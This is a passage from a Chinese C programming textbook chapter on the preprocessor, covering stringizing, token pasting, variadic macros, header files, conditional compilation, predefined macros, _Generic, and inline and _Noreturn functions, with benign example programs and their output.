1210 C允许在字符串中包含宏参数。在类函数宏的替换体中,#号作为一个 预处理运算符,可以把记号转换成字符串。例如,如果x是一个宏形参,那 么#x就是转换为字符串"x"的形参名。这个过程称为字符串化 (stringizing)。程序清单16.3演示了该过程的用法。 程序清单16.3 subst.c程序 /* subst.c -- 在字符串中替换 */ #include <stdio.h> #define PSQR(x) printf("The square of " #x " is %d.\n",((x)*(x))) int main(void) { int y = 5; PSQR(y); PSQR(2 + 4); return 0; } 该程序的输出如下: The square of y is 25. The square of 2 + 4 is 36. 调用第1个宏时,用"y"替换#x。调用第2个宏时,用"2 + 4"替换#x。 ANSI C字符串的串联特性将这些字符串与printf()语句的其他字符串组合,生 成最终的字符串。例如,第1次调用变成: 1211 printf("The square of " "y" " is %d.\n",((y)*(y))); 然后,字符串串联功能将这3个相邻的字符串组合成一个字符串: "The square of y is %d.\n" 16.3.2 预处理器黏合剂:##运算符 与#运算符类似,##运算符可用于类函数宏的替换部分。而且,##还可 用于对象宏的替换部分。##运算符把两个记号组合成一个记号。例如,可以 这样做: #define XNAME(n) x ## n 然后,宏XNAME(4)将展开为x4。程序清单16.4演示了##作为记号粘合 剂的用法。 程序清单16.4 glue.c程序 // glue.c -- 使用##运算符 #include <stdio.h> #define XNAME(n) x ## n #define PRINT_XN(n) printf("x" #n " = %d\n", x ## n); int main(void) { int XNAME(1) = 14;   // 变成 int x1 = 14; int XNAME(2) = 20;  // 变成 int x2 = 20; int x3 = 30; 1212 PRINT_XN(1);      // 变成 printf("x1 = %d\n", x1); PRINT_XN(2);      // 变成 printf("x2 = %d\n", x2); PRINT_XN(3);      // 变成 printf("x3 = %d\n", x3); return 0; } 该程序的输出如下: x1 = 14 x2 = 20 x3 = 30 注意,PRINT_XN()宏用#运算符组合字符串,##运算符把记号组合为一 个新的标识符。 16.3.3 变参宏:...和_ _VA_ARGS_ _ 一些函数(如 printf())接受数量可变的参数。stdvar.h 头文件(本章后 面介绍)提供了工具,让用户自定义带可变参数的函数。C99/C11也对宏提 供了这样的工具。虽然标准中未使用“可变”(variadic)这个词,但是它已 成为描述这种工具的通用词(虽然,C标准的索引添加了字符串化 (stringizing)词条,但是,标准并未把固定参数的函数或宏称为固定函数和不 变宏)。 通过把宏参数列表中最后的参数写成省略号(即,3个点...)来实现这 一功能。这样,预定义宏 _ _VA_ARGS_ _可用在替换部分中,表明省略号代表什么。例如,下面 的定义: 1213 #define PR(...) 
printf(_ _VA_ARGS_ _) 假设稍后调用该宏: PR("Howdy"); PR("weight = %d, shipping = $%.2f\n", wt, sp); 对于第1次调用,_ _VA_ARGS_ _展开为1个参数:"Howdy"。 对于第2次调用,_ _VA_ARGS_ _展开为3个参数:"weight = %d, shipping = $%.2f\n"、wt、sp。 因此,展开后的代码是: printf("Howdy"); printf("weight = %d, shipping = $%.2f\n", wt, sp); 程序清单16.5演示了一个示例,该程序使用了字符串的串联功能和#运 算符。 程序清单16.5 variadic.c程序 // variadic.c -- 变参宏 #include <stdio.h> #include <math.h> #define PR(X, ...) printf("Message " #X ": " __VA_ARGS__) int main(void) { double x = 48; 1214 double y; y = sqrt(x); PR(1, "x = %g\n", x); PR(2, "x = %.2f, y = %.4f\n", x, y); return 0; } 第1个宏调用,X的值是1,所以#X变成"1"。展开后成为: print("Message " "1" ": " "x = %g\n", x); 然后,串联4个字符,把调用简化为: print("Message 1: x = %g\n", x); 下面是该程序的输出: Message 1: x = 48 Message 2: x = 48.00, y = 6.9282 记住,省略号只能代替最后的宏参数: #define WRONG(X, ..., Y) #X #_ _VA_ARGS_ _ #y //不能这样做 1215 16.4 宏和函数的选择 有些编程任务既可以用带参数的宏完成,也可以用函数完成。应该使用 宏还是函数?这没有硬性规定,但是可以参考下面的情况。 使用宏比使用普通函数复杂一些,稍有不慎会产生奇怪的副作用。一些 编译器规定宏只能定义成一行。不过,即使编译器没有这个限制,也应该这 样做。 宏和函数的选择实际上是时间和空间的权衡。宏生成内联代码,即在程 序中生成语句。如果调用20次宏,即在程序中插入20行代码。如果调用函数 20次,程序中只有一份函数语句的副本,所以节省了空间。然而另一方面, 程序的控制必须跳转至函数内,随后再返回主调程序,这显然比内联代码花 费更多的时间。 宏的一个优点是,不用担心变量类型(这是因为宏处理的是字符串,而 不是实际的值)。因此,只要能用int或float类型都可以使用SQUARE(x)宏。 C99提供了第3种可替换的方法——内联函数。本章后面将介绍。 对于简单的函数,程序员通常使用宏,如下所示: #define MAX(X,Y) ((X) > (Y) ? (X) : (Y)) #define ABS(X) ((X) < 0 ? -(X) : (X)) #define ISSIGN(X) ((X) == '+' || (X) == '-' ? 1 : 0) (如果x是一个代数符号字符,最后一个宏的值为1,即为真。) 要注意以下几点。 记住宏名中不允许有空格,但是在替换字符串中可以有空格。ANSI C 允许在参数列表中使用空格。 1216 用圆括号把宏的参数和整个替换体括起来。这样能确保被括起来的部分 在下面这样的表达式中正确地展开: forks = 2 * MAX(guests + 3, last); 用大写字母表示宏函数的名称。该惯例不如用大写字母表示宏常量应用 广泛。但是,大写字母可以提醒程序员注意,宏可能产生的副作用。 如果打算使用宏来加快程序的运行速度,那么首先要确定使用宏和使用 函数是否会导致较大差异。在程序中只使用一次的宏无法明显减少程序的运 行时间。在嵌套循环中使用宏更有助于提高效率。许多系统提供程序分析器 以帮助程序员压缩程序中最耗时的部分。 假设你开发了一些方便的宏函数,是否每写一个新程序都要重写这些 宏?如果使用#include指令,就不用这样做了。 1217 16.5 文件包含:#include 当预处理器发现#include 指令时,会查看后面的文件名并把文件的内容 包含到当前文件中,即替换源文件中的#include指令。这相当于把被包含文 件的全部内容输入到源文件#include指令所在的位置。#include指令有两种形 式: #include <stdio.h>     ←文件名在尖括号中 #include "mystuff.h"   ←文件名在双引号中 在 UNIX 系统中,尖括号告诉预处理器在标准系统目录中查找该文件。 双引号告诉预处理器首先在当前目录中(或文件名中指定的其他目录)查找 该文件,如果未找到再查找标准系统目录: #include <stdio.h>     ←查找系统目录 #include "hot.h"      ←查找当前工作目录 #include "/usr/biff/p.h" ←查找/usr/biff目录 集成开发环境(IDE)也有标准路径或系统头文件的路径。许多集成开 发环境提供菜单选项,指定用尖括号时的查找路径。在 UNIX 中,使用双引 号意味着先查找本地目录,但是具体查找哪个目录取决于编译器的设定。有 些编译器会搜索源代码文件所在的目录,有些编译器则搜索当前的工作目 录,还有些搜索项目文件所在的目录。 ANSI C不为文件提供统一的目录模型,因为不同的计算机所用的系统 不同。一般而言,命名文件的方法因系统而异,但是尖括号和双引号的规则 与系统无关。 为什么要包含文件?因为编译器需要这些文件中的信息。例如,stdio.h 文件中通常包含EOF、NULL、getchar()和 putchar()的定义。getchar()和 putchar()被定义为宏函数。此外,该文件中还包含C的其他I/O函数。 1218 C语言习惯用.h后缀表示头文件,这些文件包含需要放在程序顶部的信 息。头文件经常包含一些预处理器指令。有些头文件(如stdio.h)由系统提 供,当然你也可以创建自己的头文件。 包含一个大型头文件不一定显著增加程序的大小。在大部分情况下,头 文件的内容是编译器生成最终代码时所需的信息,而不是添加到最终代码中 的材料。 16.5.1 头文件示例 假设你开发了一个存放人名的结构,还编写了一些使用该结构的函数。 可以把不同的声明放在头文件中。程序清单16.6演示了一个这样的例子。 程序清单16.6 names_st.h头文件 // names_st.h -- names_st 结构的头文件 // 常量 #include <string.h> #define SLEN 32 // 结构声明 struct names_st { char first[SLEN]; char last[SLEN]; }; // 类型定义 1219 typedef struct names_st names; // 函数原型 void get_names(names *); void show_names(const names *); char * s_gets(char * st, int n); 该头文件包含了一些头文件中常见的内容:#define指令、结构声明、 typedef和函数原型。注意,这些内容是编译器在创建可执行代码时所需的信 息,而不是可执行代码。为简单起见,这个特殊的头文件过于简单。通常, 应该用#ifndef和#define防止多重包含头文件。我们稍后介绍这些内容。 可执行代码通常在源代码文件中,而不是在头文件中。例如,程序清单 16.7中有头文件中函数原型的定义。该程序包含了names_st.h头文件,所以 编译器知道names类型。 程序清单16.7 name_st.c源文件 // names_st.c -- 定义 names_st.h中的函数 #include <stdio.h> #include "names_st.h"  // 包含头文件 // 函数定义 void get_names(names * pn) { printf("Please enter your first name: "); 
s_gets(pn->first, SLEN); 1220 printf("Please enter your last name: "); s_gets(pn->last, SLEN); } void show_names(const names * pn) { printf("%s %s", pn->first, pn->last); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') 1221 continue;   // 处理输入行中的剩余字符 } return ret_val; } get_names()函数通过s_gets()函数调用了fgets()函数,避免了目标数组溢 出。程序清单16.8使用了程序清单16.6的头文件和程序清单16.7的源文件。 程序清单16.8 useheader.c程序 // useheader.c -- 使用 names_st 结构 #include <stdio.h> #include "names_st.h" // 记住要链接 names_st.c int main(void) { names candidate; get_names(&candidate); printf("Let's welcome "); show_names(&candidate); printf(" to this program!\n"); return 0; 1222 } 下面是该程序的输出: Please enter your first name: Ian Please enter your last name: Smersh Let's welcome Ian Smersh to this program! 该程序要注意下面几点。 两个源代码文件都使用names_st类型结构,所以它们都必须包含 names_st.h头文件。 必须编译和链接names_st.c和useheader.c源代码文件。 声明和指令放在nems_st.h头文件中,函数定义放在names_st.c源代码文 件中。 16.5.2 使用头文件 浏览任何一个标准头文件都可以了解头文件的基本信息。头文件中最常 用的形式如下。 明示常量——例如,stdio.h中定义的EOF、NULL和BUFSIZE(标准I/O 缓冲区大小)。 宏函数——例如,getc(stdin)通常用getchar()定义,而getc()经常用于定 义较复杂的宏,头文件ctype.h通常包含ctype系列函数的宏定义。 函数声明——例如,string.h头文件(一些旧的系统中是strings.h)包含 字符串函数系列的函数声明。在ANSI C和后面的标准中,函数声明都是函 数原型形式。 结构模版定义——标准I/O函数使用FILE结构,该结构中包含了文件和 1223 与文件缓冲区相关的信息。FILE结构在头文件stdio.h中。 类型定义——标准 I/O 函数使用指向 FILE 的指针作为参数。通常, stdio.h 用#define 或typedef把FILE定义为指向结构的指针。类似地,size_t和 time_t类型也定义在头文件中。 许多程序员都在程序中使用自己开发的标准头文件。如果开发一系列相 关的函数或结构,那么这种方法特别有价值。 另外,还可以使用头文件声明外部变量供其他文件共享。例如,如果已 经开发了共享某个变量的一系列函数,该变量报告某种状况(如,错误情 况),这种方法就很有效。这种情况下,可以在包含这些函数声明的源代码 文件定义一个文件作用域的外部链接变量: int status = 0;    // 该变量具有文件作用域,在源代码文件 然后,可以在与源代码文件相关联的头文件中进行引用式声明: extern int status;   // 在头文件中 这行代码会出现在包含了该头文件的文件中,这样使用该系列函数的文 件都能使用这个变量。虽然源代码文件中包含该头文件后也包含了该声明, 但是只要声明的类型一致,在一个文件中同时使用定义式声明和引用式声明 没问题。 需要包含头文件的另一种情况是,使用具有文件作用域、内部链接和 const 限定符的变量或数组。const 防止值被意外修改,static 意味着每个包含 该头文件的文件都获得一份副本。因此,不需要在一个文件中进行定义式声 明,在其他文件中进行引用式声明。 #include和#define指令是最常用的两个C预处理器特性。接下来,我们介 绍一些其他指令。 1224 16.6 其他指令 程序员可能要为不同的工作环境准备C程序和C库包。不同的环境可能 使用不同的代码类型。预处理器提供一些指令,程序员通过修改#define的值 即可生成可移植的代码。#undef指令取消之前的#define定义。#if、#ifdef、 #ifndef、#else、#elif和#endif指令用于指定什么情况下编写哪些代码。#line 指令用于重置行和文件信息,#error指令用于给出错误消息,#pragma指令用 于向编译器发出指令。 16.6.1 #undef指令 #undef指令用于“取消”已定义的#define指令。也就是说,假设有如下定 义: #define LIMIT 400 然后,下面的指令: #undef LIMIT 将移除上面的定义。现在就可以把LIMIT重新定义为一个新值。即使原 来没有定义LIMIT,取消LIMIT的定义仍然有效。如果想使用一个名称,又 不确定之前是否已经用过,为安全起见,可以用#undef 指令取消该名字的定 义。 16.6.2 从C预处理器角度看已定义 处理器在识别标识符时,遵循与C相同的规则:标识符可以由大写字 母、小写字母、数字和下划线字符组成,且首字符不能是数字。当预处理器 在预处理器指令中发现一个标识符时,它会把该标识符当作已定义的或未定 义的。这里的已定义表示由预处理器定义。如果标识符是同一个文件中由前 面的#define指令创建的宏名,而且没有用#undef 指令关闭,那么该标识符是 已定义的。如果标识符不是宏,假设是一个文件作用域的C变量,那么该标 1225 识符对预处理器而言就是未定义的。 已定义宏可以是对象宏,包括空宏或类函数宏: #define LIMIT 1000     // LIMIT是已定义的 #define GOOD        // GOOD 是已定义的 #define A(X) ((-(X))*(X)) // A 是已定义的 int q;           // q 不是宏,因此是未定义的 #undef GOOD        // GOOD 取消定义,是未定义的 注意,#define宏的作用域从它在文件中的声明处开始,直到用#undef指 令取消宏为止,或延伸至文件尾(以二者中先满足的条件作为宏作用域的结 束)。另外还要注意,如果宏通过头文件引入,那么#define在文件中的位置 取决于#include指令的位置。 稍后将介绍几个预定义宏,如__DATE__和__FILE__。这些宏一定是已 定义的,而且不能取消定义。 16.6.3 条件编译 可以使用其他指令创建条件编译(conditinal compilation)。也就是说, 可以使用这些指令告诉编译器根据编译时的条件执行或忽略信息(或代码) 块。 1.#ifdef、#else和#endif指令 我们用一个简短的示例来演示条件编译的情况。考虑下面的代码: #ifdef MAVIS #include "horse.h"// 如果已经用#define定义了 MAVIS,则执行下面的指 令 1226 #define STABLES 5 #else #include "cow.h"    //如果没有用#define定义 MAVIS,则执行下面的 指令 #define STABLES 15 #endif 这里使用的较新的编译器和 ANSI 标准支持的缩进格式。如果使用旧的 
编译器,必须左对齐所有的指令或至少左对齐#号,如下所示: #ifdef MAVIS #include "horse.h"     // 如果已经用#define定义了 MAVIS,则执行 下面的指令 #define STABLES 5 #else #include "cow.h"      //如果没有用#define定义 MAVIS,则执行下 面的指令 #define STABLES 15 #endif #ifdef指令说明,如果预处理器已定义了后面的标识符(MAVIS),则 执行#else或#endif指令之前的所有指令并编译所有C代码(先出现哪个指令 就执行到哪里)。如果预处理器未定义MAVIS,且有 #else指令,则执行 #else和#endif指令之间的所有代码。 #ifdef #else很像C的if else。两者的主要区别是,预处理器不识别用于标 1227 记块的花括号({}),因此它使用#else(如果需要)和#endif(必须存在) 来标记指令块。这些指令结构可以嵌套。也可以用这些指令标记C语句块, 如程序清单16.9所示。 程序清单16.9 ifdef.c程序 /* ifdef.c -- 使用条件编译 */ #include <stdio.h> #define JUST_CHECKING #define LIMIT 4 int main(void) { int i; int total = 0; for (i = 1; i <= LIMIT; i++) { total += 2 * i*i + 1; #ifdef JUST_CHECKING printf("i=%d, running total = %d\n", i, total); #endif } printf("Grand total = %d\n", total); 1228 return 0; } 编译并运行该程序后,输出如下: i=1, running total = 3 i=2, running total = 12 i=3, running total = 31 i=4, running total = 64 Grand total = 64 如果省略JUST_CHECKING定义(把它放在C注释中,或者使用#undef指 令取消它的定义)并重新编译该程序,只会输出最后一行。可以用这种方法 在调试程序。定义JUST_CHECKING并合理使用#ifdef,编译器将执行用于 调试的程序代码,打印中间值。调试结束后,可移除JUST_CHECKING定义 并重新编译。如果以后还需要使用这些信息,重新插入定义即可。这样做省 去了再次输入额外打印语句的麻烦。#ifdef还可用于根据不同的C实现选择合 适的代码块。 2.#ifndef指令 #ifndef指令与#ifdef指令的用法类似,也可以和#else、#endif一起使用, 但是它们的逻辑相反。#ifndef指令判断后面的标识符是否是未定义的,常用 于定义之前未定义的常量。如下所示: /* arrays.h */ #ifndef SIZE #define SIZE 100 1229 #endif (旧的实现可能不允许使用缩进的#define) 通常,包含多个头文件时,其中的文件可能包含了相同宏定义。#ifndef 指令可以防止相同的宏被重复定义。在首次定义一个宏的头文件中用#ifndef 指令激活定义,随后在其他头文件中的定义都被忽略。 #ifndef指令还有另一种用法。假设有上面的arrays.h头文件,然后把下面 一行代码放入一个头文件中: #include "arrays.h" SIZE被定义为100。但是,如果把下面的代码放入该头文件: #define SIZE 10 #include "arrays.h" SIZE则被设置为10。这里,当执行到#include "arrays.h"这行,处理 array.h中的代码时,由于SIZE是已定义的,所以跳过了#define SIZE 100这行 代码。鉴于此,可以利用这种方法,用一个较小的数组测试程序。测试完毕 后,移除#define SIZE 10并重新编译。这样,就不用修改头文件数组本身 了。 #ifndef指令通常用于防止多次包含一个文件。也就是说,应该像下面这 样设置头文件: /* things.h */ #ifndef THINGS_H_ #define THINGS_H_ /* 省略了头文件中的其他内容*/ 1230 #endif 假设该文件被包含了多次。当预处理器首次发现该文件被包含时, THINGS_H_是未定义的,所以定义了THINGS_H_,并接着处理该文件的其 他部分。当预处理器第2次发现该文件被包含时,THINGS_H_是已定义的, 所以预处理器跳过了该文件的其他部分。 为何要多次包含一个文件?最常见的原因是,许多被包含的文件中都包 含着其他文件,所以显式包含的文件中可能包含着已经包含的其他文件。这 有什么问题?在被包含的文件中有某些项(如,一些结构类型的声明)只能 在一个文件中出现一次。C标准头文件使用#ifndef技巧避免重复包含。但 是,这存在一个问题:如何确保待测试的标识符没有在别处定义。通常,实 现的供应商使用这些方法解决这个问题:用文件名作为标识符、使用大写字 母、用下划线字符代替文件名中的点字符、用下划线字符做前缀或后缀(可 能使用两条下划线)。例如,查看stdio.h头文件,可以发现许多类似的代 码: #ifndef _STDIO_H #define _STDIO_H // 省略了文件的内容 #endif 你也可以这样做。但是,由于标准保留使用下划线作为前缀,所以在自 己的代码中不要这样写,避免与标准头文件中的宏发生冲突。程序清单 16.10修改了程序清单16.6中的头文件,使用#ifndef避免文件被重复包含。 程序清单16.10 names.c程序 // names.h --修订后的 names_st 头文件,避免重复包含 #ifndef NAMES_H_ 1231 #define NAMES_H_ // 明示常量 #define SLEN 32 // 结构声明 struct names_st { char first[SLEN]; char last[SLEN]; }; // 类型定义 typedef struct names_st names; // 函数原型 void get_names(names *); void show_names(const names *); char * s_gets(char * st, int n); #endif 用程序清单16.11的程序测试该头文件没问题,但是如果把清单16.10中 的#ifndef保护删除后,程序就无法通过编译。 程序清单16.11 doubincl.c程序 1232 // doubincl.c -- 包含头文件两次 #include <stdio.h> #include "names.h" #include "names.h"  // 不小心第2次包含头文件 int main() { names winner = { "Less", "Ismoor" }; printf("The winner is %s %s.\n", winner.first, winner.last); return 0; } 3.#if和#elif指令 #if指令很像C语言中的if。#if后面跟整型常量表达式,如果表达式为非 零,则表达式为真。可以在指令中使用C的关系运算符和逻辑运算符: #if SYS == 1 #include "ibm.h" #endif 可以按照if else的形式使用#elif(早期的实现不支持#elif)。例如,可 以这样写: #if SYS == 1 1233 #include "ibmpc.h" #elif SYS == 2 #include "vax.h" #elif SYS == 3 #include "mac.h" #else #include "general.h" #endif 较新的编译器提供另一种方法测试名称是否已定义,即用#if defined (VAX)代替#ifdef VAX。 这里,defined是一个预处理运算符,如果它的参数是用#defined定义 过,则返回1;否则返回0。这种新方法的优点是,它可以和#elif一起使用。 
下面用这种形式重写前面的示例: #if defined (IBMPC) #include "ibmpc.h" #elif defined (VAX) #include "vax.h" #elif defined (MAC) #include "mac.h" #else 1234 #include "general.h" #endif 如果在VAX机上运行这几行代码,那么应该在文件前面用下面的代码定 义VAX: #define VAX 条件编译还有一个用途是让程序更容易移植。改变文件开头部分的几个 关键的定义,即可根据不同的系统设置不同的值和包含不同的文件。 16.6.4 预定义宏 C标准规定了一些预定义宏,如表16.1所列。 表16.1 预 定 义 宏 C99 标准提供一个名为_ _func_ _的预定义标识符,它展开为一个代表 函数名的字符串(该函数包含该标识符)。那么,_ _func_ _必须具有函数 作用域,而从本质上看宏具有文件作用域。因此,_ _func_ _是C语言的预定 义标识符,而不是预定义宏。 程序清单16.12 中使用了一些预定义宏和预定义标识符。注意,其中一 些是C99 新增的,所以不支持C99的编译器可能无法识别它们。如果使用 GCC,必须设置-std=c99或-std=c11。 1235 程序清单16.12 predef.c程序 // predef.c -- 预定义宏和预定义标识符 #include <stdio.h> void why_me(); int main() { printf("The file is %s.\n", __FILE__); printf("The date is %s.\n", __DATE__); printf("The time is %s.\n", __TIME__); printf("The version is %ld.\n", __STDC_VERSION__); printf("This is line %d.\n", __LINE__); printf("This function is %s\n", __func__); why_me(); return 0; } void why_me() { printf("This function is %s\n", __func__); printf("This is line %d.\n", __LINE__); 1236 } 下面是该程序的输出: The file is predef.c. The date is Sep 23 2013. The time is 22:01:09. The version is 201112. This is line 11. This function is main This function is why_me This is line 21. 16.6.5 #line和#error #line指令重置_ _LINE_ _和_ _FILE_ _宏报告的行号和文件名。可以这 样使用#line: #line 1000       // 把当前行号重置为1000 #line 10 "cool.c"   // 把行号重置为10,把文件名重置为cool.c #error 指令让预处理器发出一条错误消息,该消息包含指令中的文本。 如果可能的话,编译过程应该中断。可以这样使用#error指令: #if _ _STDC_VERSION_ _ != 201112L #error Not C11 #endif 1237 编译以上代码生成后,输出如下: $ gcc newish.c newish.c:14:2: error: #error Not C11 $ gcc -std=c11 newish.c $ 如果编译器只支持旧标准,则会编译失败,如果支持C11标准,就能成 功编译。 16.6.6 #pragma 在现在的编译器中,可以通过命令行参数或IDE菜单修改编译器的一些 设置。#pragma把编译器指令放入源代码中。例如,在开发C99时,标准被 称为C9X,可以使用下面的编译指示(pragma)让编译器支持C9X: #pragma c9x on 一般而言,编译器都有自己的编译指示集。例如,编译指示可能用于控 制分配给自动变量的内存量,或者设置错误检查的严格程度,或者启用非标 准语言特性等。C99 标准提供了 3 个标准编译指示,但是超出了本书讨论的 范围。 C99还提供_Pragma预处理器运算符,该运算符把字符串转换成普通的 编译指示。例如: _Pragma("nonstandardtreatmenttypeB on") 等价于下面的指令: #pragma nonstandardtreatmenttypeB on 由于该运算符不使用#符号,所以可以把它作为宏展开的一部分: 1238 #define PRAGMA(X) _Pragma(#X) #define LIMRG(X) PRAGMA(STDC CX_LIMITED_RANGE X) 然后,可以使用类似下面的代码: LIMRG ( ON ) 顺带一提,下面的定义看上去没问题,但实际上无法正常运行: #define LIMRG(X) _Pragma(STDC CX_LIMITED_RANGE #X) 问题在于这行代码依赖字符串的串联功能,而预处理过程完成之后才会 串联字符串。 _Pragma 运算符完成“解字符串”(destringizing)的工作,即把字符串中 的转义序列转换成它所代表的字符。因此, _Pragma("use_bool \"true \"false") 变成了: #pragma use_bool "true "false 16.6.7 泛型选择(C11) 在程序设计中,泛型编程(generic programming)指那些没有特定类 型,但是一旦指定一种类型,就可以转换成指定类型的代码。例如,C++在 模板中可以创建泛型算法,然后编译器根据指定的类型自动使用实例化代 码。C没有这种功能。然而,C11新增了一种表达式,叫作泛型选择表达式 (generic selection expression),可根据表达式的类型(即表达式的类型是 int、double 还是其他类型)选择一个值。泛型选择表达式不是预处理器指 令,但是在一些泛型编程中它常用作#define宏定义的一部分。 下面是一个泛型选择表达式的示例: 1239 _Generic(x, int: 0, float: 1, double: 2, default: 3) _Generic是C11的关键字。_Generic后面的圆括号中包含多个用逗号分隔 的项。第1个项是一个表达式,后面的每个项都由一个类型、一个冒号和一 个值组成,如float: 1。第1个项的类型匹配哪个标签,整个表达式的值是该 标签后面的值。例如,假设上面表达式中x是int类型的变量,x的类型匹配 int:标签,那么整个表达式的值就是0。如果没有与类型匹配的标签,表达式 的值就是default:标签后面的值。泛型选择语句与 switch 语句类似,只是前 者用表达式的类型匹配标签,而后者用表达式的值匹配标签。 下面是一个把泛型选择语句和宏定义组合的例子: #define MYTYPE(X) _Generic((X),\ int: "int",\ float : "float",\ double: "double",\ default: "other"\ ) 宏必须定义为一条逻辑行,但是可以用\把一条逻辑行分隔成多条物理 行。在这种情况下,对泛型选择表达式求值得字符串。例如,对 MYTYPE(5)求值得"int",因为值5的类型与int:标签匹配。程序清单16.13演 示了这种用法。 程序清单16.13 mytype.c程序 // mytype.c #include <stdio.h> 1240 #define MYTYPE(X) _Generic((X),\ int: "int",\ float : "float",\ double: "double",\ default: "other"\ ) int main(void) { int d = 5; printf("%s\n", MYTYPE(d));   // d 是int类型 printf("%s\n", MYTYPE(2.0*d)); // 2.0 * d 是double类型 
printf("%s\n", MYTYPE(3L));   // 3L 是long类型 printf("%s\n", MYTYPE(&d));  // &d 的类型是 int * return 0; } 下面是该程序的输出: int double other 1241 other MYTYPE()最后两个示例所用的类型与标签不匹配,所以打印默认的字 符串。可以使用更多类型标签来扩展宏的能力,但是该程序主要是为了演示 _Generic的基本工作原理。 对一个泛型选择表达式求值时,程序不会先对第一个项求值,它只确定 类型。只有匹配标签的类型后才会对表达式求值。 可以像使用独立类型(“泛型”)函数那样使用_Generic 定义宏。本章后 面介绍 math 库时会给出一个示例。 1242 16.7 内联函数(C99) 通常,函数调用都有一定的开销,因为函数的调用过程包括建立调用、 传递参数、跳转到函数代码并返回。使用宏使代码内联,可以避免这样的开 销。C99还提供另一种方法:内联函数(inline function)。读者可能顾名思 义地认为内联函数会用内联代码替换函数调用。其实C99和C11标准中叙述 的是:“把函数变成内联函数建议尽可能快地调用该函数,其具体效果由实 现定义”。因此,把函数变成内联函数,编译器可能会用内联代码替换函数 调用,并(或)执行一些其他的优化,但是也可能不起作用。 创建内联函数的定义有多种方法。标准规定具有内部链接的函数可以成 为内联函数,还规定了内联函数的定义与调用该函数的代码必须在同一个文 件中。因此,最简单的方法是使用函数说明符 inline 和存储类别说明符 static。通常,内联函数应定义在首次使用它的文件中,所以内联函数也相 当于函数原型。如下所示: #include <stdio.h> inline static void eatline()  // 内联函数定义/原型 { while (getchar() != '\n') continue; } int main() { ... 1243 eatline();       // 函数调用 ... } 编译器查看内联函数的定义(也是原型),可能会用函数体中的代码替 换 eatline()函数调用。也就是说,效果相当于在函数调用的位置输入函数体 中的代码: #include <stdio.h> inline static void eatline() //内联函数定义/原型 { while (getchar() != '\n') continue; } int main() { ... while (getchar() != '\n') //替换函数调用 continue; ... } 由于并未给内联函数预留单独的代码块,所以无法获得内联函数的地址 1244 (实际上可以获得地址,不过这样做之后,编译器会生成一个非内联函 数)。另外,内联函数无法在调试器中显示。 内联函数应该比较短小。把较长的函数变成内联并未节约多少时间,因 为执行函数体的时间比调用函数的时间长得多。 编译器优化内联函数必须知道该函数定义的内容。这意味着内联函数定 义与函数调用必须在同一个文件中。鉴于此,一般情况下内联函数都具有内 部链接。因此,如果程序有多个文件都要使用某个内联函数,那么这些文件 中都必须包含该内联函数的定义。最简单的做法是,把内联函数定义放入头 文件,并在使用该内联函数的文件中包含该头文件即可。 // eatline.h #ifndef EATLINE_H_ #define EATLINE_H_ inline static void eatline() { while (getchar() != '\n') continue; } #endif 一般都不在头文件中放置可执行代码,内联函数是个特例。因为内联函 数具有内部链接,所以在多个文件中定义同一个内联函数不会产生什么问 题。 与C++不同的是,C还允许混合使用内联函数定义和外部函数定义(具 1245 有外部链接的函数定义)。例如,一个程序中使用下面3个文件: //file1.c ... inline static double square(double); double square(double x) { return x * x; } int main() { double q = square(1.3); ... //file2.c ... double square(double x) { return (int) (x*x); } void spam(double v) { double kv = square(v); ... //file3.c ... inline double square(double x) { return (int) (x * x + 0.5); } 1246 void masp(double w) { double kw = square(w); ... 
如上述代码所示,3个文件中都定义了square()函数。file1.c文件中是 inline static定义;file2.c 文件中是普通的函数定义(因此具有外部链接); file3.c 文件中是 inline 定义,省略了static。 3个文件中的函数都调用了square()函数,这会发生什么情况?。file1.c 文件中的main()使用square()的局部static定义。由于该定义也是inline定义, 所以编译器有可能优化代码,也许会内联该函数。file2.c 文件中,spam()函 数使用该文件中 square()函数的定义,该定义具有外部链接,其他文件也可 见。file3.c文件中,编译器既可以使用该文件中square()函数的内联定义,也 可以使用file2.c文件中的外部链接定义。如果像file3.c那样,省略file1.c文件 inline定义中的static,那么该inline定义被视为可替换的外部定义。 注意GCC在C99之前就使用一些不同的规则实现了内联函数,所以GCC 可以根据当前编译器的标记来解释inline。 1247 16.8 _Noreturn函数(C11) C99新增inline关键字时,它是唯一的函数说明符(关键字extern和static 是存储类别说明符,可应用于数据对象和函数)。C11新增了第2个函数说 明符_Noreturn,表明调用完成后函数不返回主调函数。exit()函数是 _Noreturn 函数的一个示例,一旦调用exit(),它不会再返回主调函数。注 意,这与void返回类型不同。void类型的函数在执行完毕后返回主调函数, 只是它不提供返回值。 _Noreturn的目的是告诉用户和编译器,这个特殊的函数不会把控制返回 主调程序。告诉用户以免滥用该函数,通知编译器可优化一些代码。 1248 16.9 C库 最初,并没有官方的C库。后来,基于UNIX的C实现成为了标准。ANSI C委员会主要以这个标准为基础,开发了一个官方的标准库。在意识到C语 言的应用范围不断扩大后,该委员会重新定义了这个库,使之可以应用于其 他系统。 我们讨论过一些标准库中的 I/O 函数、字符函数和字符串函数。本章将 介绍更多函数。不过,首先要学习如何使用库。 16.9.1 访问C库 如何访问C库取决于实现,因此你要了解当前系统的一般情况。首先, 可以在多个不同的位置找到库函数。例如,getchar()函数通常作为宏定义在 stdio.h头文件中,而strlen()通常在库文件中。其次,不同的系统搜索这些函 数的方法不同。下面介绍3种可能的方法。 1.自动访问 在一些系统中,只需编译程序,就可使用一些常用的库函数。 记住,在使用函数之前必须先声明函数的类型,通过包含合适的头文件 即可完成。在描述库函数的用户手册中,会指出使用某函数时应包含哪个头 文件。但是在一些旧系统上,可能必须自己输入函数声明。再次提醒读者, 用户手册中指明了函数类型。另外,附录B“参考资料”中根据头文件分组, 总结了ANSI C库函数。 过去,不同的实现使用的头文件名不同。ANSI C标准把库函数分为多 个系列,每个系列的函数原型都放在一个特定的头文件中。 2.文件包含 如果函数被定义为宏,那么可以通过#include 指令包含定义宏函数的文 件。通常,类似的宏都放在合适名称的头文件中。例如,许多系统(包括所 1249 有的ANSI C系统)都有ctype.h文件,该文件中包含了一些确定字符性质(如 大写、数字等)的宏。 3.库包含 在编译或链接程序的某些阶段,可能需要指定库选项。即使在自动检查 标准库的系统中,也会有不常用的函数库。必须通过编译时选项显式指定这 些库。注意,这个过程与包含头文件不同。头文件提供函数声明或原型,而 